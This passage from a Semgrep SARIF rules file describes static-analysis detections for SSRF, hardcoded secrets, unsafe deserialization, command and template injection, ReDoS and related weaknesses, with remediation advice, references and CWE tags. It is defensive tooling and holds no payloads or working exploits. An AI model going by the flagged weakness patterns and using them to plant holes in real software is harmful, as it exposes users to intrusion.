and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","id":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","name":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"help":{"markdown":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle","id":"python.lang.security.deserialization.pickle.avoid-cPickle","name":"python.lang.security.deserialization.pickle.avoid-cPickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.pickle.avoid-cPickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"help":{"markdown":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n","text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","id":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","name":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Do not use `math/rand`. Use `crypto/rand` instead."},"help":{"markdown":"Do not use `math/rand`. Use `crypto/rand` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation)\n","text":"Do not use `math/rand`. Use `crypto/rand` instead."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used","id":"go.lang.security.audit.crypto.math_random.math-random-used","name":"go.lang.security.audit.crypto.math_random.math-random-used","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.math_random.math-random-used"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Secret Access Key detected"},"help":{"markdown":"AWS Secret Access Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Secret Access Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","id":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","name":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"help":{"markdown":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django)\n - [https://cwe.mitre.org/data/definitions/117.html](https://cwe.mitre.org/data/definitions/117.html)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures)\n","text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"helpUri":"https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","id":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","name":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","properties":{"precision":"very-high","tags":["CWE-117: Improper Output Neutralization for Logs","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"help":{"markdown":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run)\n - [https://deno.land/manual/examples/subprocess#simple-example](https://deno.land/manual/examples/subprocess#simple-example)\n","text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","id":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","name":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"help":{"markdown":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled)\n","text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"helpUri":"https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","id":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","name":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","id":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","name":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"help":{"markdown":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing)\n - [https://www.npmjs.com/package/serve-index](https://www.npmjs.com/package/serve-index)\n - [https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/](https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/)\n","text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","id":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","name":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","properties":{"precision":"very-high","tags":["CWE-548: Exposure of Information Through Directory Listing","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url","id":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","name":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"help":{"markdown":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","id":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","name":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"JWT token detected"},"help":{"markdown":"JWT token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"JWT token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token","id":"generic.secrets.security.detected-jwt-token.detected-jwt-token","name":"generic.secrets.security.detected-jwt-token.detected-jwt-token","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-jwt-token.detected-jwt-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"help":{"markdown":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)\n - [https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/](https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/)\n - [https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)\n","text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"helpUri":"https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","id":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","name":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","CWE-862: Missing Authorization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"help":{"markdown":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection)\n - [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)\n","text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection","id":"csharp.dotnet.security.razor-template-injection.razor-template-injection","name":"csharp.dotnet.security.razor-template-injection.razor-template-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.razor-template-injection.razor-template-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"help":{"markdown":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"helpUri":"https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","id":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","name":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"help":{"markdown":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape)\n - [https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates)\n - [https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code](https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code)\n","text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","id":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","name":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"help":{"markdown":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting)\n - [https://www.owasp.org/index.php/HTTP_Response_Splitting](https://www.owasp.org/index.php/HTTP_Response_Splitting)\n","text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting","id":"java.lang.security.audit.http-response-splitting.http-response-splitting","name":"java.lang.security.audit.http-response-splitting.http-response-splitting","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: 